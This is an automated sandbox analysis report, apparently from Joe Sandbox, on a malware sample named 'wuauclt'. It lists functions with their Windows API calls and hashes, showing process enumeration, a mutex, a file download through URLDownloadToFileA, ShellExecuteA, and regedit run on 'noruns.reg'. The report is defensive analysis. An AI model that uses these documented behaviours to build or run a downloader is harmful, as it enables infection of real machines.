                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: db41b0ba3a44b8224a4d418b805d9062f5bccf6ef3d49d7edfc8f6e9fd2d226f
                                                                            • Instruction ID: a4e659a15bfe6cc6a5175c85437e059c15b529ad29c6638f01f64b8e280c5786
                                                                            • Opcode Fuzzy Hash: db41b0ba3a44b8224a4d418b805d9062f5bccf6ef3d49d7edfc8f6e9fd2d226f
                                                                            • Instruction Fuzzy Hash: 8BE0FEB2204209BFEB00DE8ADCC1DABB7ACFB4C654F804115BB1C97242D275AC608B71
                                                                            Function 00404414 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 8b228866068003d5a64e75c2e509e979b335083b2cdf08991ca5778dcb1b938b
                                                                            • Instruction ID: 1a50dcc7cdea4a8dd795a97503a1aea6df38831d2862f32125516eae5aa71f33
                                                                            • Opcode Fuzzy Hash: 8b228866068003d5a64e75c2e509e979b335083b2cdf08991ca5778dcb1b938b
                                                                            • Instruction Fuzzy Hash: 3BE0FEB2204209BBDB00DE8ADCC1DABB7ACFB4C654F804105BB1C972428275AC608B71
                                                                            Function 004047BC Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004047CD
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2242398760-0
                                                                            • Opcode ID: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction ID: c40cfb2cff0e8543d494dcdfcbf93d461de1da01fd97da5991265f8cc755c822
                                                                            • Opcode Fuzzy Hash: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction Fuzzy Hash: EFC012A261122017CA1066F52C844C3579CC9891FA31404B3B704E7141E2398C105294
                                                                            Function 004042AA Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction ID: 42de1c329415a5983c08d079f819a82d79578491e5c84c113ccbfbe26003380b
                                                                            • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction Fuzzy Hash: 88D01273250248AFC700EEBDCC06DAB33DC9B68609B048429B918C7100D13DE9508B60
                                                                            Function 004042AC Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction ID: dbdaa29d8d5ab3acf8359d31fd046521d7a3cbff9559bf3fa2f5df482b1e4750
                                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction Fuzzy Hash: 01C01273150248ABC700EEA9CC06D9B33DC5B68609B048429B918C7100C13DE5508B60
                                                                            Function 00408494 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 004080C8: DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                              • Part of subcall function 004080C8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                              • Part of subcall function 004081E8: DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 004081E8: DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                              • Part of subcall function 004081E8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                              • Part of subcall function 004081E8: Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$Download$ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1369373786-0
                                                                            • Opcode ID: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction ID: 670bd1f1822fbab38942ef8954843972be358391e24c76c7ecbd6b66639f9f51
                                                                            • Opcode Fuzzy Hash: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction Fuzzy Hash: 15C012A011820062D600BBA6AA02B5A668C0F80714F41443EB6C4A60C1EE3C8044822A
                                                                            Function 00404BFC Relevance: 1.5, APIs: 1, Instructions: 12registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction ID: c017c2d3cd7702cc40293f0c0b92f299cfcc0552216a4ded47398421e2e7ca9f
                                                                            • Opcode Fuzzy Hash: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction Fuzzy Hash: 49C08CF03092007BDA0CAA148C03F7E329C8780750F00442DB28096185C66054008129
                                                                            Function 004068D0 Relevance: 1.5, APIs: 1, Instructions: 11networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                              • Part of subcall function 00406728: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedExecuteInternetShellState
                                                                            • String ID:
                                                                            • API String ID: 3822808191-0
                                                                            • Opcode ID: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction ID: cb9ba5a357dbf17f807466452ced53c340c992696767b35d6928e3153f41e3a9
                                                                            • Opcode Fuzzy Hash: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction Fuzzy Hash: 41C08CB110820061D6007B62AD01B5A66CC8F80704F41483E7684E20C4EB3CC444922A
                                                                            Function 004013AC Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401410
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction ID: 1e9abf7fae11d483954ba497bcecb7b42a35322519b3fee74413ce08071db684
                                                                            • Opcode Fuzzy Hash: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction Fuzzy Hash: CC21F970608711AFD710DF19D88065BBBE4EF85720F14C92AE4989B3A1D378EC41CB5A
                                                                            Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004014D1
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 21dbc31cb6900595ad653052610acc884adf6bc7d0a0183df4107cd3429863bc
                                                                            • Instruction ID: b23f443f85bfc2a6968270b1b6cd2558eb490b707325928d34c95879452a6769
                                                                            • Opcode Fuzzy Hash: 21dbc31cb6900595ad653052610acc884adf6bc7d0a0183df4107cd3429863bc
                                                                            • Instruction Fuzzy Hash: 2C11AC72A047019FC320CF29CD80A2BB7E1EBC4360F15C63EE588A73B5E634AC40C689
                                                                            Function 004014F8 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,?,00003FFF,0040175F), ref: 00401552
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction ID: 909510ce892baa7c9b48256ed29b6e7cd33d2823f62f9fa2e1c19f749eef1782
                                                                            • Opcode Fuzzy Hash: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction Fuzzy Hash: 7C01F7726443146FC310DE28DCC092A77A4EBC5364F15053EDA86AB3A1E63AAC0187A9
                                                                            Function 00439CC7 Relevance: 1.3, APIs: 1, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,?,?,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439D1B
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction ID: 794ef5d78045ed4d742bdaeeac8ed0779eb977f76541356490a23fe8d5b0fb08
                                                                            • Opcode Fuzzy Hash: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction Fuzzy Hash: 3EF0B4B26493207AF124670AAC8BF973F5CDF85B75F00042AF64D5A1C1E4997C10C2BA
                                                                            Function 004381FA Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,004381FA,004381FA,004381FA), ref: 00438265
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction ID: cf7fc80abf0a610b938b0f6de2e472192636330f029e0b36f2c69517e1b1d411
                                                                            • Opcode Fuzzy Hash: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction Fuzzy Hash: E5018831A443189BDB359E29CC04BDAB7B1EB44750F2104ADF584B7281CAB4AE808E08
                                                                            Function 0040285C Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction ID: 24a9b9a5f53f68d2e9ae0a20dfd92328ab467e55e5b9cffb966d9a0b50497f93
                                                                            • Opcode Fuzzy Hash: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction Fuzzy Hash: 48A022C222330002C80022F20CC2EA2808CA2082EA3A000A23000C00A3C82C08800020
                                                                            Function 004084B8 Relevance: 1.3, APIs: 1, Instructions: 4sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(000493E0), ref: 004084BD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1839875000-0
                                                                            • Opcode ID: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction ID: 531a484f82c7889d25c20d7142e9803b131f223dc912937a257ed96ba5c7c79c
                                                                            • Opcode Fuzzy Hash: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction Fuzzy Hash:

                                                                            Non-executed Functions

                                                                            Function 004072AC Relevance: 129.8, APIs: 21, Strings: 53, Instructions: 296sleepfilewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(0000012C,00000000,0040775D,?,00000003,00000000,00000000), ref: 004073A8
                                                                            • ShellExecuteA.SHELL32(00000000,open,regedit.exe,00000000,noruns.reg,?), ref: 004073E8
